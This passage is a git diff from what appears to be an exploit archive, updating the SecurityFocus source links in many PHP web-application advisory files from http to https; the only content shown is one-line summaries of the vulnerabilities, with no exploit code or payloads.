b/exploits/php/webapps/27162.txt index d41423f9d..72ece9b94 100644 --- a/exploits/php/webapps/27162.txt +++ b/exploits/php/webapps/27162.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16482/info +source: https://www.securityfocus.com/bid/16482/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27164.txt b/exploits/php/webapps/27164.txt index 8821828d6..6e06e037a 100644 --- a/exploits/php/webapps/27164.txt +++ b/exploits/php/webapps/27164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16520/info +source: https://www.securityfocus.com/bid/16520/info UBB.Threads is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27165.txt b/exploits/php/webapps/27165.txt index 70134d51e..bce219fda 100644 --- a/exploits/php/webapps/27165.txt +++ b/exploits/php/webapps/27165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16521/info +source: https://www.securityfocus.com/bid/16521/info Beehive Forum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27166.txt b/exploits/php/webapps/27166.txt index c5d63580c..260acef45 100644 --- a/exploits/php/webapps/27166.txt +++ b/exploits/php/webapps/27166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16537/info +source: https://www.securityfocus.com/bid/16537/info The eyeOS system is prone to a remote command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data. diff --git a/exploits/php/webapps/27167.txt b/exploits/php/webapps/27167.txt index cd0585951..0d5d0687f 100644 --- a/exploits/php/webapps/27167.txt +++ b/exploits/php/webapps/27167.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16538/info +source: https://www.securityfocus.com/bid/16538/info MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27170.txt b/exploits/php/webapps/27170.txt index f8f588f16..645ca363a 100644 --- a/exploits/php/webapps/27170.txt +++ b/exploits/php/webapps/27170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16547/info +source: https://www.securityfocus.com/bid/16547/info The vwdev application is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27172.txt b/exploits/php/webapps/27172.txt index f76a7baff..f4809c114 100644 --- a/exploits/php/webapps/27172.txt +++ b/exploits/php/webapps/27172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16556/info +source: https://www.securityfocus.com/bid/16556/info SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27173.txt b/exploits/php/webapps/27173.txt index 2c3e310c2..13ec23a62 100644 --- a/exploits/php/webapps/27173.txt +++ b/exploits/php/webapps/27173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16559/info +source: https://www.securityfocus.com/bid/16559/info CPAINT is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27175.php b/exploits/php/webapps/27175.php index dc94c1a1e..495703278 100644 --- a/exploits/php/webapps/27175.php +++ b/exploits/php/webapps/27175.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16567/info +source: https://www.securityfocus.com/bid/16567/info PwsPHP is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
diff --git a/exploits/php/webapps/27176.txt b/exploits/php/webapps/27176.txt index 2876d5690..5d2fc334d 100644 --- a/exploits/php/webapps/27176.txt +++ b/exploits/php/webapps/27176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16573/info +source: https://www.securityfocus.com/bid/16573/info Papoo is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27183.txt b/exploits/php/webapps/27183.txt index 288a32ff8..9c7ba9159 100644 --- a/exploits/php/webapps/27183.txt +++ b/exploits/php/webapps/27183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16580/info +source: https://www.securityfocus.com/bid/16580/info FarsiNews is prone to directory-traversal and local file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27184.txt b/exploits/php/webapps/27184.txt index 66870f746..e2edf90b8 100644 --- a/exploits/php/webapps/27184.txt +++ b/exploits/php/webapps/27184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16591/info +source: https://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. diff --git a/exploits/php/webapps/27185.txt b/exploits/php/webapps/27185.txt index c0003078b..53fd77726 100644 --- a/exploits/php/webapps/27185.txt +++ b/exploits/php/webapps/27185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16591/info +source: https://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. diff --git a/exploits/php/webapps/27186.txt b/exploits/php/webapps/27186.txt index 2dc445ef6..a7c24aebd 100644 
--- a/exploits/php/webapps/27186.txt +++ b/exploits/php/webapps/27186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16591/info +source: https://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. diff --git a/exploits/php/webapps/27192.txt b/exploits/php/webapps/27192.txt index 07add8f98..202527b10 100644 --- a/exploits/php/webapps/27192.txt +++ b/exploits/php/webapps/27192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27193.txt b/exploits/php/webapps/27193.txt index 79ddbdfa5..1f4171fef 100644 --- a/exploits/php/webapps/27193.txt +++ b/exploits/php/webapps/27193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27194.txt b/exploits/php/webapps/27194.txt index 002380ff9..741e5ae45 100644 --- a/exploits/php/webapps/27194.txt +++ b/exploits/php/webapps/27194.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27195.txt b/exploits/php/webapps/27195.txt index 8a808ccfc..d3103edf5 100644 --- a/exploits/php/webapps/27195.txt +++ b/exploits/php/webapps/27195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16592/info +source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'include_once()' PHP function in multiple scripts. The PHP code-injection vulnerabilities are due to insufficient input validation of data that is saved to log files. diff --git a/exploits/php/webapps/27197.txt b/exploits/php/webapps/27197.txt index 24661328c..cc7147117 100644 --- a/exploits/php/webapps/27197.txt +++ b/exploits/php/webapps/27197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27198.txt b/exploits/php/webapps/27198.txt index 779adbb8b..48f66112a 100644 --- a/exploits/php/webapps/27198.txt +++ b/exploits/php/webapps/27198.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27199.txt b/exploits/php/webapps/27199.txt index 48509e76d..385f47876 100644 --- a/exploits/php/webapps/27199.txt +++ b/exploits/php/webapps/27199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27200.txt b/exploits/php/webapps/27200.txt index 4275bd446..f0d600169 100644 --- a/exploits/php/webapps/27200.txt +++ b/exploits/php/webapps/27200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16594/info +source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content injection. diff --git a/exploits/php/webapps/27201.txt b/exploits/php/webapps/27201.txt index d6c452a1e..34b92b9d7 100644 --- a/exploits/php/webapps/27201.txt +++ b/exploits/php/webapps/27201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16596/info +source: https://www.securityfocus.com/bid/16596/info Siteframe Beaumont is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27202.txt b/exploits/php/webapps/27202.txt index 27c8367a1..e1d658ec6 100644 --- a/exploits/php/webapps/27202.txt +++ b/exploits/php/webapps/27202.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16598/info +source: https://www.securityfocus.com/bid/16598/info DB_eSession is prone to an SQL-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27204.html b/exploits/php/webapps/27204.html index 2162e715a..601f8c430 100644 --- a/exploits/php/webapps/27204.html +++ b/exploits/php/webapps/27204.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16600/info +source: https://www.securityfocus.com/bid/16600/info Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities. diff --git a/exploits/php/webapps/27205.html b/exploits/php/webapps/27205.html index 867dd7898..f4444b84a 100644 --- a/exploits/php/webapps/27205.html +++ b/exploits/php/webapps/27205.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16600/info +source: https://www.securityfocus.com/bid/16600/info Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities. diff --git a/exploits/php/webapps/27206.txt b/exploits/php/webapps/27206.txt index 4b98d6f8d..a832f47c8 100644 --- a/exploits/php/webapps/27206.txt +++ b/exploits/php/webapps/27206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16604/info +source: https://www.securityfocus.com/bid/16604/info XMB Forum is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27207.txt b/exploits/php/webapps/27207.txt index 101aaba93..1c21b8ad2 100644 --- a/exploits/php/webapps/27207.txt +++ b/exploits/php/webapps/27207.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16607/info +source: https://www.securityfocus.com/bid/16607/info Clever Copy is prone to multiple HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27208.txt b/exploits/php/webapps/27208.txt index 10e4b3f5f..03ee8cee2 100644 --- a/exploits/php/webapps/27208.txt +++ b/exploits/php/webapps/27208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16608/info +source: https://www.securityfocus.com/bid/16608/info PHPNuke is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27209.txt b/exploits/php/webapps/27209.txt index ad3b63b9a..1dce0819c 100644 --- a/exploits/php/webapps/27209.txt +++ b/exploits/php/webapps/27209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16615/info +source: https://www.securityfocus.com/bid/16615/info Gastebuch is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27213.txt b/exploits/php/webapps/27213.txt index 65e2de613..be1e5d797 100644 --- a/exploits/php/webapps/27213.txt +++ b/exploits/php/webapps/27213.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16638/info +source: https://www.securityfocus.com/bid/16638/info QwikiWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27214.txt b/exploits/php/webapps/27214.txt index df79c13e4..8892ad03a 100644 --- a/exploits/php/webapps/27214.txt +++ b/exploits/php/webapps/27214.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16642/info +source: https://www.securityfocus.com/bid/16642/info PHP Classifieds is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27215.txt b/exploits/php/webapps/27215.txt index 0fc978123..bc4ce7cf0 100644 --- a/exploits/php/webapps/27215.txt +++ b/exploits/php/webapps/27215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16647/info +source: https://www.securityfocus.com/bid/16647/info sNews is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27216.txt b/exploits/php/webapps/27216.txt index 7bb37f1a6..db4b6d8ef 100644 --- a/exploits/php/webapps/27216.txt +++ b/exploits/php/webapps/27216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16647/info +source: https://www.securityfocus.com/bid/16647/info sNews is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27217.txt b/exploits/php/webapps/27217.txt index ee11bea64..7ab4eafef 100644 --- a/exploits/php/webapps/27217.txt +++ b/exploits/php/webapps/27217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27218.txt b/exploits/php/webapps/27218.txt index 6f90d0d60..7dbb2d670 100644 --- a/exploits/php/webapps/27218.txt +++ b/exploits/php/webapps/27218.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27219.txt b/exploits/php/webapps/27219.txt index 0a0709950..09ac07dc9 100644 --- a/exploits/php/webapps/27219.txt +++ b/exploits/php/webapps/27219.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27220.txt b/exploits/php/webapps/27220.txt index e9fc5798f..1b5def7c2 100644 --- a/exploits/php/webapps/27220.txt +++ b/exploits/php/webapps/27220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27221.txt b/exploits/php/webapps/27221.txt index 328ad84d4..8721b8d9a 100644 --- a/exploits/php/webapps/27221.txt +++ b/exploits/php/webapps/27221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27222.txt b/exploits/php/webapps/27222.txt index 8e23f00fd..71043ee47 100644 --- a/exploits/php/webapps/27222.txt +++ b/exploits/php/webapps/27222.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27223.txt b/exploits/php/webapps/27223.txt index 7a3149f9e..a9d865ef0 100644 --- a/exploits/php/webapps/27223.txt +++ b/exploits/php/webapps/27223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27224.txt b/exploits/php/webapps/27224.txt index b6d394bae..3aa308fad 100644 --- a/exploits/php/webapps/27224.txt +++ b/exploits/php/webapps/27224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27225.txt b/exploits/php/webapps/27225.txt index 7fd3c28f5..a5539997a 100644 --- a/exploits/php/webapps/27225.txt +++ b/exploits/php/webapps/27225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16648/info +source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27226.txt b/exploits/php/webapps/27226.txt index a2db81cd4..841dca513 100644 --- a/exploits/php/webapps/27226.txt +++ b/exploits/php/webapps/27226.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16652/info +source: https://www.securityfocus.com/bid/16652/info RunCMS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27227.txt b/exploits/php/webapps/27227.txt index b617f6c03..c966abb70 100644 --- a/exploits/php/webapps/27227.txt +++ b/exploits/php/webapps/27227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16656/info +source: https://www.securityfocus.com/bid/16656/info WordPress is prone to an HTML-injection vulnerability. diff --git a/exploits/php/webapps/27228.txt b/exploits/php/webapps/27228.txt index e268ad586..9cfffbe3b 100644 --- a/exploits/php/webapps/27228.txt +++ b/exploits/php/webapps/27228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16657/info +source: https://www.securityfocus.com/bid/16657/info Mantis is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27229.txt b/exploits/php/webapps/27229.txt index 0c732df0f..4989bfb77 100644 --- a/exploits/php/webapps/27229.txt +++ b/exploits/php/webapps/27229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16657/info +source: https://www.securityfocus.com/bid/16657/info Mantis is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27230.txt b/exploits/php/webapps/27230.txt index e81978c2d..405dee9c0 100644 --- a/exploits/php/webapps/27230.txt +++ b/exploits/php/webapps/27230.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16659/info +source: https://www.securityfocus.com/bid/16659/info My Blog is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27236.txt b/exploits/php/webapps/27236.txt index 3f6e38587..623671656 100644 --- a/exploits/php/webapps/27236.txt +++ b/exploits/php/webapps/27236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16678/info +source: https://www.securityfocus.com/bid/16678/info MyBB is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27237.txt b/exploits/php/webapps/27237.txt index 9c98d094e..66317e73f 100644 --- a/exploits/php/webapps/27237.txt +++ b/exploits/php/webapps/27237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16680/info +source: https://www.securityfocus.com/bid/16680/info HTML::BBCode is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27238.php b/exploits/php/webapps/27238.php index a69923a9b..f6493bb6f 100644 --- a/exploits/php/webapps/27238.php +++ b/exploits/php/webapps/27238.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16682/info +source: https://www.securityfocus.com/bid/16682/info HostAdmin is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27239.txt b/exploits/php/webapps/27239.txt index de41f776a..5681c8b61 100644 --- a/exploits/php/webapps/27239.txt +++ b/exploits/php/webapps/27239.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16684/info +source: https://www.securityfocus.com/bid/16684/info BirthSys is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27240.txt b/exploits/php/webapps/27240.txt index 9273f804b..3472814a2 100644 --- a/exploits/php/webapps/27240.txt +++ b/exploits/php/webapps/27240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16689/info +source: https://www.securityfocus.com/bid/16689/info MyBB is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27242.txt b/exploits/php/webapps/27242.txt index 3401a14db..f7d27a5d3 100644 --- a/exploits/php/webapps/27242.txt +++ b/exploits/php/webapps/27242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16692/info +source: https://www.securityfocus.com/bid/16692/info MyBB is prone to a cross-site scripting vulnerability.. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27243.txt b/exploits/php/webapps/27243.txt index 015facd93..ec61ead37 100644 --- a/exploits/php/webapps/27243.txt +++ b/exploits/php/webapps/27243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16695/info +source: https://www.securityfocus.com/bid/16695/info Siteframe Beaumont is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27245.txt b/exploits/php/webapps/27245.txt index 631b2ac2f..9f994c9a1 100644 --- a/exploits/php/webapps/27245.txt +++ b/exploits/php/webapps/27245.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16706/info +source: https://www.securityfocus.com/bid/16706/info V-webmail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27247.txt b/exploits/php/webapps/27247.txt index 214548000..e0addc15d 100644 --- a/exploits/php/webapps/27247.txt +++ b/exploits/php/webapps/27247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16719/info +source: https://www.securityfocus.com/bid/16719/info The e107 content management system (CMS) Chatbox Plugin is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27248.txt b/exploits/php/webapps/27248.txt index 6a316ff68..9c0681f98 100644 --- a/exploits/php/webapps/27248.txt +++ b/exploits/php/webapps/27248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16721/info +source: https://www.securityfocus.com/bid/16721/info Webpagecity 'WPC.easy' is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27249.html b/exploits/php/webapps/27249.html index da4c02e60..a472c6ff1 100644 --- a/exploits/php/webapps/27249.html +++ b/exploits/php/webapps/27249.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16722/info +source: https://www.securityfocus.com/bid/16722/info The CAPTCHA implementation of PHPNuke may be bypassed by remote attackers due to a design error. diff --git a/exploits/php/webapps/27250.txt b/exploits/php/webapps/27250.txt index 73a6bf03c..f21558f2e 100644 --- a/exploits/php/webapps/27250.txt +++ b/exploits/php/webapps/27250.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16731/info +source: https://www.securityfocus.com/bid/16731/info Time Tracking Software is prone to an access-validation vulnerability. This issue is due the application's failure to limit access to administrative sections of the application. diff --git a/exploits/php/webapps/27251.txt b/exploits/php/webapps/27251.txt index 805f4d1b6..91ad69f18 100644 --- a/exploits/php/webapps/27251.txt +++ b/exploits/php/webapps/27251.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16734/info +source: https://www.securityfocus.com/bid/16734/info Magic Calendar Lite is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27252.txt b/exploits/php/webapps/27252.txt index 63cf1e3ce..75420a9b3 100644 --- a/exploits/php/webapps/27252.txt +++ b/exploits/php/webapps/27252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16740/info +source: https://www.securityfocus.com/bid/16740/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated HTML content. diff --git a/exploits/php/webapps/27254.txt b/exploits/php/webapps/27254.txt index 611e91f25..15059d726 100644 --- a/exploits/php/webapps/27254.txt +++ b/exploits/php/webapps/27254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16752/info +source: https://www.securityfocus.com/bid/16752/info PostNuke is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27255.txt b/exploits/php/webapps/27255.txt index 71818e77f..d566368fb 100644 --- a/exploits/php/webapps/27255.txt +++ b/exploits/php/webapps/27255.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16752/info +source: https://www.securityfocus.com/bid/16752/info PostNuke is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27256.txt b/exploits/php/webapps/27256.txt index f59c99515..0311b0320 100644 --- a/exploits/php/webapps/27256.txt +++ b/exploits/php/webapps/27256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16769/info +source: https://www.securityfocus.com/bid/16769/info RunCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27259.txt b/exploits/php/webapps/27259.txt index 8da019e5d..cefe23413 100644 --- a/exploits/php/webapps/27259.txt +++ b/exploits/php/webapps/27259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16772/info +source: https://www.securityfocus.com/bid/16772/info Noah's Classifieds is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27260.txt b/exploits/php/webapps/27260.txt index 520b5e3fd..fd3d6ea80 100644 --- a/exploits/php/webapps/27260.txt +++ b/exploits/php/webapps/27260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16773/info +source: https://www.securityfocus.com/bid/16773/info Noah's Classifieds is prone to an SQL-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27261.txt b/exploits/php/webapps/27261.txt index 5d36665ee..b9f3329fc 100644 --- a/exploits/php/webapps/27261.txt +++ b/exploits/php/webapps/27261.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16778/info +source: https://www.securityfocus.com/bid/16778/info Noah's Classifieds is prone to a local file-include vulnerability. This may facilitate the unauthorized viewing of files and unauthorized execution of local scripts. diff --git a/exploits/php/webapps/27262.txt b/exploits/php/webapps/27262.txt index f6addf3d5..51cf329a7 100644 --- a/exploits/php/webapps/27262.txt +++ b/exploits/php/webapps/27262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16780/info +source: https://www.securityfocus.com/bid/16780/info Noah's Classifieds is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/27263.txt b/exploits/php/webapps/27263.txt index 7ae10687a..39acb15f0 100644 --- a/exploits/php/webapps/27263.txt +++ b/exploits/php/webapps/27263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27264.txt b/exploits/php/webapps/27264.txt index b8999716c..613b8dea3 100644 --- a/exploits/php/webapps/27264.txt +++ b/exploits/php/webapps/27264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16784/info +source: https://www.securityfocus.com/bid/16784/info Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27265.txt b/exploits/php/webapps/27265.txt index 